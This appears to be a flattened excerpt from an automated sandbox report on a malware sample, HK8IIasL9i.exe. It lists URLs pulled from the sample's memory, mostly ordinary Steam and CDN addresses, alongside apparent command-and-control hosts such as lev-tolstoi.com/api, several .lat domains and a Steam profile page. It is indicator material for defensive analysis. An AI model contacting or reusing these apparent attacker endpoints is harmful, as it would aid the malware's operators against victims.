                              high
                              rapeflowwj.latfalse
                                high
                                https://steamcommunity.com/profiles/76561199724331900false
                                  high
                                  energyaffai.latfalse
                                    high
                                    https://lev-tolstoi.com/apifalse
                                      high
                                      grannyejh.latfalse
                                        high
                                        necklacebudi.latfalse
                                          high
                                          crosshuaht.latfalse
                                            high
                                            discokeyus.latfalse
                                              high
                                              NameSourceMaliciousAntivirus DetectionReputation
                                              https://community.fastly.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.pngHK8IIasL9i.exe, 00000000.00000003.2129274532.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2107333028.00000000006B5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                high
                                                https://player.vimeo.comHK8IIasL9i.exe, 00000000.00000003.2129420517.000000000066D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  high
                                                  https://community.fastly.steamstatic.com/public/css/promo/summer2017/stickers.css?v=Ncr6N09yZIap&ampHK8IIasL9i.exe, 00000000.00000003.2129274532.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2107333028.00000000006AE000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2107333028.00000000006B5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    high
                                                    https://steamcommunity.com/?subsection=broadcastsHK8IIasL9i.exe, 00000000.00000003.2129274532.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2107333028.00000000006B5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      high
                                                      https://store.steampowered.com/subscriber_agreement/HK8IIasL9i.exe, 00000000.00000003.2129274532.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2107333028.00000000006B5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        high
                                                        https://www.gstatic.cn/recaptcha/HK8IIasL9i.exe, 00000000.00000003.2129420517.000000000066D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          high
                                                          https://login.sHK8IIasL9i.exe, 00000000.00000003.2138966821.000000000066C000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2129470803.000000000067C000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000002.2488539547.000000000067D000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2139680967.000000000067C000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2129310310.000000000066C000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2139619811.000000000066D000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2129420517.000000000066D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            unknown
                                                            https://community.fastly.steamstatic.com/public/javascript/applications/community/manifest.js?v=hyEEHK8IIasL9i.exe, 00000000.00000003.2129274532.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2107333028.00000000006AE000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2129310310.0000000000629000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2107333028.00000000006B5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              high
                                                              https://lev-tolstoi.com/outlooHK8IIasL9i.exe, 00000000.00000003.2138966821.000000000066C000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000002.2488539547.000000000067D000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2139680967.000000000067C000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2139619811.000000000066D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                unknown
                                                                http://www.valvesoftware.com/legal.htmHK8IIasL9i.exe, 00000000.00000003.2129274532.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2107333028.00000000006B5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  high
                                                                  https://community.fastly.steamstatic.com/public/shared/css/shared_global.css?v=wuA4X_n5-mo0&l=enHK8IIasL9i.exe, 00000000.00000003.2129274532.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2107333028.00000000006AE000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2107333028.00000000006B5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    high
                                                                    https://www.youtube.comHK8IIasL9i.exe, 00000000.00000003.2129420517.000000000066D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      high
                                                                      https://www.google.comHK8IIasL9i.exe, 00000000.00000003.2129420517.000000000066D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        high
                                                                        https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20FeedbackHK8IIasL9i.exe, 00000000.00000003.2129274532.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2107333028.00000000006B5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          high
                                                                          https://community.fastly.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6HK8IIasL9i.exe, 00000000.00000003.2129274532.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2107333028.00000000006AE000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2129310310.0000000000629000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2107333028.00000000006B5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            high
                                                                            https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/HK8IIasL9i.exe, 00000000.00000003.2129420517.000000000066D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              high
                                                                              https://community.fastly.steamstatic.com/public/shared/css/motiva_sans.css?v=-yZgCk0Nu7kH&l=englHK8IIasL9i.exe, 00000000.00000003.2107333028.00000000006B5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                high
                                                                                https://community.fastly.steamstatic.com/public/css/skin_1/profilev2.css?v=fe66ET2uI50l&l=englisHK8IIasL9i.exe, 00000000.00000003.2129274532.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2107333028.00000000006AE000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2107333028.00000000006B5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  https://community.fastly.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=pbdAKOcDIgbCHK8IIasL9i.exe, 00000000.00000003.2129274532.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2107333028.00000000006AE000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2107333028.00000000006B5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    https://s.ytimg.com;HK8IIasL9i.exe, 00000000.00000003.2129420517.000000000066D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      https://community.fastly.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1HK8IIasL9i.exe, 00000000.00000003.2129274532.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2107333028.00000000006AE000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2138966821.0000000000619000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2107333028.00000000006B5000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000002.2488368597.0000000000619000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        https://community.fastly.steamstatic.com/public/shared/css/buttons.css?v=qhQgyjWi6LgJ&l=english&HK8IIasL9i.exe, 00000000.00000003.2129274532.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2107333028.00000000006AE000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2107333028.00000000006B5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          https://steamcommunity.com/profiles/76561199724331900lNHK8IIasL9i.exe, 00000000.00000003.2138966821.0000000000619000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000002.2488368597.0000000000619000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            https://community.fastly.steamstatic.com/HK8IIasL9i.exe, 00000000.00000003.2129420517.000000000066D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              https://lev-tolstoi.com/dHK8IIasL9i.exe, 00000000.00000003.2138966821.000000000066C000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000002.2488539547.000000000067D000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2139680967.000000000067C000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2139619811.000000000066D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                unknown
                                                                                                https://steam.tv/HK8IIasL9i.exe, 00000000.00000003.2129420517.000000000066D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  high
                                                                                                  https://community.fastly.steamstatic.com/public/javascript/promo/stickers.js?v=CcLRHsa04otQ&l=enHK8IIasL9i.exe, 00000000.00000003.2129274532.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2107333028.00000000006AE000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2107333028.00000000006B5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    high
                                                                                                    https://lev-tolstoi.com/HK8IIasL9i.exe, 00000000.00000003.2129420517.000000000066D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      high
                                                                                                      http://store.steampowered.com/privacy_agreement/HK8IIasL9i.exe, 00000000.00000003.2129274532.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2107333028.00000000006AE000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2138966821.0000000000619000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2107333028.00000000006B5000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000002.2488368597.0000000000619000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        high
                                                                                                        https://store.steampowered.com/points/shop/HK8IIasL9i.exe, 00000000.00000003.2129274532.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2107333028.00000000006B5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          high
                                                                                                          https://community.fastly.steamstatic.com/public/javascript/modalv2.js?v=zBXEuexVQ0FZ&l=english&aHK8IIasL9i.exe, 00000000.00000003.2129274532.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2107333028.00000000006AE000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2107333028.00000000006B5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            high
                                                                                                            https://sketchfab.comHK8IIasL9i.exe, 00000000.00000003.2129420517.000000000066D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                              high
                                                                                                              https://lv.queniujq.cnHK8IIasL9i.exe, 00000000.00000003.2129420517.000000000066D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                high
                                                                                                                https://steamcommunity.com/profiles/76561199724331900/inventory/HK8IIasL9i.exe, 00000000.00000003.2129274532.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2107333028.00000000006AE000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2138966821.0000000000619000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2107333028.00000000006B5000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000002.2488368597.0000000000619000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  high
                                                                                                                  https://www.youtube.com/HK8IIasL9i.exe, 00000000.00000003.2129420517.000000000066D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    high
                                                                                                                    https://store.steampowered.com/privacy_agreement/HK8IIasL9i.exe, 00000000.00000003.2129274532.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2107333028.00000000006B5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                      high
                                                                                                                      https://community.fastly.steamstatic.com/public/css/skin_1/modalContent.css?v=WXAusLHclDIt&l=engHK8IIasL9i.exe, 00000000.00000003.2129274532.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2107333028.00000000006AE000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2107333028.00000000006B5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                        high
                                                                                                                        https://steambroadcast.akamaized.nrMHK8IIasL9i.exe, 00000000.00000003.2129470803.000000000067C000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2129310310.000000000066C000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2129420517.000000000066D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                          unknown
                                                                                                                          https://community.fastly.steamstatic.com/public/javascript/global.js?v=jWc2JLWHx5Kn&l=english&amHK8IIasL9i.exe, 00000000.00000003.2129274532.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2107333028.00000000006AE000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2107333028.00000000006B5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                            high
                                                                                                                            https://www.google.com/recaptcha/HK8IIasL9i.exe, 00000000.00000003.2129420517.000000000066D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              high
                                                                                                                              https://checkout.steampowered.com/HK8IIasL9i.exe, 00000000.00000003.2129420517.000000000066D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                high
                                                                                                                                https://store.steampowered.com/;HK8IIasL9i.exe, 00000000.00000003.2129420517.000000000066D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                  high
                                                                                                                                  https://store.steampowered.com/about/HK8IIasL9i.exe, 00000000.00000003.2107333028.00000000006B5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                    high
                                                                                                                                    https://steamcommunity.com/my/wishlist/HK8IIasL9i.exe, 00000000.00000003.2129274532.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2107333028.00000000006B5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                      high
                                                                                                                                      https://community.fastly.steamstatic.com/public/shared/css/shared_responsive.css?v=JL1e4uQSrVGe&HK8IIasL9i.exe, 00000000.00000003.2129274532.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2107333028.00000000006AE000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2107333028.00000000006B5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                        high
                                                                                                                                        https://help.steampowered.com/en/HK8IIasL9i.exe, 00000000.00000003.2129274532.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2107333028.00000000006B5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                          high
                                                                                                                                          https://steamcommunity.com/market/HK8IIasL9i.exe, 00000000.00000003.2129274532.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2107333028.00000000006B5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                            high
                                                                                                                                            https://store.steampowered.com/news/HK8IIasL9i.exe, 00000000.00000003.2129274532.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2107333028.00000000006B5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                              high
                                                                                                                                              https://community.fastly.steamstatic.com/public/javascript/webui/clientcom.js?v=St3gSJx2HFUZ&l=eHK8IIasL9i.exe, 00000000.00000003.2129274532.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2107333028.00000000006AE000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2107333028.00000000006B5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                high
                                                                                                                                                https://lev-tolstoi.com/apipHK8IIasL9i.exe, 00000000.00000003.2129470803.000000000067C000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2129310310.000000000066C000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2129420517.000000000066D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                  unknown
                                                                                                                                                  http://store.steampowered.com/subscriber_agreement/HK8IIasL9i.exe, 00000000.00000003.2129274532.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2107333028.00000000006AE000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2138966821.0000000000619000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2107333028.00000000006B5000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000002.2488368597.0000000000619000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                    high
                                                                                                                                                    https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.orgHK8IIasL9i.exe, 00000000.00000003.2129274532.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2107333028.00000000006AE000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2138966821.0000000000619000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2107333028.00000000006B5000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000002.2488368597.0000000000619000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                      high
                                                                                                                                                      https://recaptcha.net/recaptcha/;HK8IIasL9i.exe, 00000000.00000003.2129420517.000000000066D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                        high
                                                                                                                                                        https://steamcommunity.com/discussions/HK8IIasL9i.exe, 00000000.00000003.2129274532.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2107333028.00000000006B5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                          high
                                                                                                                                                          https://store.steampowered.com/stats/HK8IIasL9i.exe, 00000000.00000003.2129274532.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2107333028.00000000006B5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                            high
                                                                                                                                                            https://community.fastly.steamstatic.com/public/shared/javascript/shared_global.js?v=Gr6TbGRvDtNE&amHK8IIasL9i.exe, 00000000.00000003.2129274532.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2107333028.00000000006AE000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2107333028.00000000006B5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                              high
                                                                                                                                                              https://medal.tvHK8IIasL9i.exe, 00000000.00000003.2129420517.000000000066D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                high
                                                                                                                                                                https://broadcast.st.dl.eccdnx.comHK8IIasL9i.exe, 00000000.00000003.2129420517.000000000066D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                  high
                                                                                                                                                                  https://community.fastly.steamstatic.com/public/shared/images/responsive/logo_valve_footer.pngHK8IIasL9i.exe, 00000000.00000003.2129274532.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2107333028.00000000006B5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                    high
                                                                                                                                                                    https://community.fastly.steamstatic.com/public/css/skin_1/header.css?v=EM4kCu67DNda&l=english&aHK8IIasL9i.exe, 00000000.00000003.2129274532.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2107333028.00000000006AE000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2107333028.00000000006B5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                      high
                                                                                                                                                                      https://store.steampowered.com/steam_refunds/HK8IIasL9i.exe, 00000000.00000003.2129274532.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2107333028.00000000006B5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                        high
                                                                                                                                                                        https://lev-tolstoi.com/apiv1HK8IIasL9i.exe, 00000000.00000003.2138966821.000000000066C000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000002.2488539547.000000000067D000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2139680967.000000000067C000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2139619811.000000000066D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                          unknown
                                                                                                                                                                          https://community.fastly.steamstatic.com/public/css/applications/community/main.css?v=Lj6X7NKUMfzk&aHK8IIasL9i.exe, 00000000.00000003.2129274532.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2107333028.00000000006AE000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2107333028.00000000006B5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                            high
                                                                                                                                                                            https://steamcommunity.com/login/home/?goto=profiles%2F76561199724331900HK8IIasL9i.exe, 00000000.00000003.2107333028.00000000006B5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                              high
                                                                                                                                                                              https://community.fastly.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016HK8IIasL9i.exe, 00000000.00000003.2129274532.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2107333028.00000000006B5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                high
                                                                                                                                                                                https://community.fastly.steamstatic.com/public/javascript/reportedcontent.js?v=-lZqrarogJr8&l=eHK8IIasL9i.exe, 00000000.00000003.2129274532.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2107333028.00000000006AE000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2107333028.00000000006B5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                  high
                                                                                                                                                                                  https://steamcommunity.com/workshop/HK8IIasL9i.exe, 00000000.00000003.2129274532.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2107333028.00000000006B5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                    high
                                                                                                                                                                                    https://login.steampowered.com/HK8IIasL9i.exe, 00000000.00000003.2129420517.000000000066D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                      high
                                                                                                                                                                                      https://store.steampowered.com/;Persistent-AuthWWW-AuthenticateVarysteamCountry=US%7C185ce35c568ebbbHK8IIasL9i.exe, 00000000.00000003.2138966821.000000000066C000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2129470803.000000000067C000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000002.2488539547.000000000067D000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2139680967.000000000067C000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2129310310.000000000066C000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2107370383.000000000067D000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2139619811.000000000066D000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2129420517.000000000066D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                        high
                                                                                                                                                                                        https://community.fastly.steamstatic.com/public/css/globalv2.css?v=hzEgqbtRcI5V&l=english&_cHK8IIasL9i.exe, 00000000.00000003.2129274532.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2107333028.00000000006AE000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2107333028.00000000006B5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                          high
                                                                                                                                                                                          https://store.steampowered.com/legal/HK8IIasL9i.exe, 00000000.00000003.2129274532.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2107333028.00000000006AE000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2138966821.0000000000619000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2107333028.00000000006B5000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000002.2488368597.0000000000619000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                            high
                                                                                                                                                                                            https://community.fastly.steamstatic.com/public/shared/javascript/tooltip.js?v=QYkT4eS5mbTN&l=enHK8IIasL9i.exe, 00000000.00000003.2129274532.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2107333028.00000000006AE000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2107333028.00000000006B5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                              high
                                                                                                                                                                                              https://community.fastly.steamstatic.com/public/javascript/prototype-1.7.js?v=npJElBnrEO6W&l=engHK8IIasL9i.exe, 00000000.00000003.2129274532.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2107333028.00000000006AE000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2107333028.00000000006B5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                high
                                                                                                                                                                                                https://community.fastly.steamstatic.com/public/javascript/profile.js?v=GeQ6v03mWpAc&l=english&aHK8IIasL9i.exe, 00000000.00000003.2129274532.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2107333028.00000000006AE000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2107333028.00000000006B5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                  high
                                                                                                                                                                                                  https://community.fastly.steamstatic.com/public/javascript/modalContent.js?v=uqf5ttWTRe7l&l=englHK8IIasL9i.exe, 00000000.00000003.2129274532.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2107333028.00000000006AE000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2107333028.00000000006B5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                    high
                                                                                                                                                                                                    https://recaptcha.netHK8IIasL9i.exe, 00000000.00000003.2129420517.000000000066D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                      high
                                                                                                                                                                                                      http://upx.sf.netAmcache.hve.4.drfalse
                                                                                                                                                                                                        high
                                                                                                                                                                                                        https://store.steampowered.com/HK8IIasL9i.exe, 00000000.00000003.2129420517.000000000066D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          high
                                                                                                                                                                                                          https://community.fastly.steamstatic.com/public/shared/images/responsive/header_logo.pngHK8IIasL9i.exe, 00000000.00000003.2129274532.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2107333028.00000000006B5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            high
                                                                                                                                                                                                            http://127.0.0.1:27060HK8IIasL9i.exe, 00000000.00000003.2129420517.000000000066D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                              high
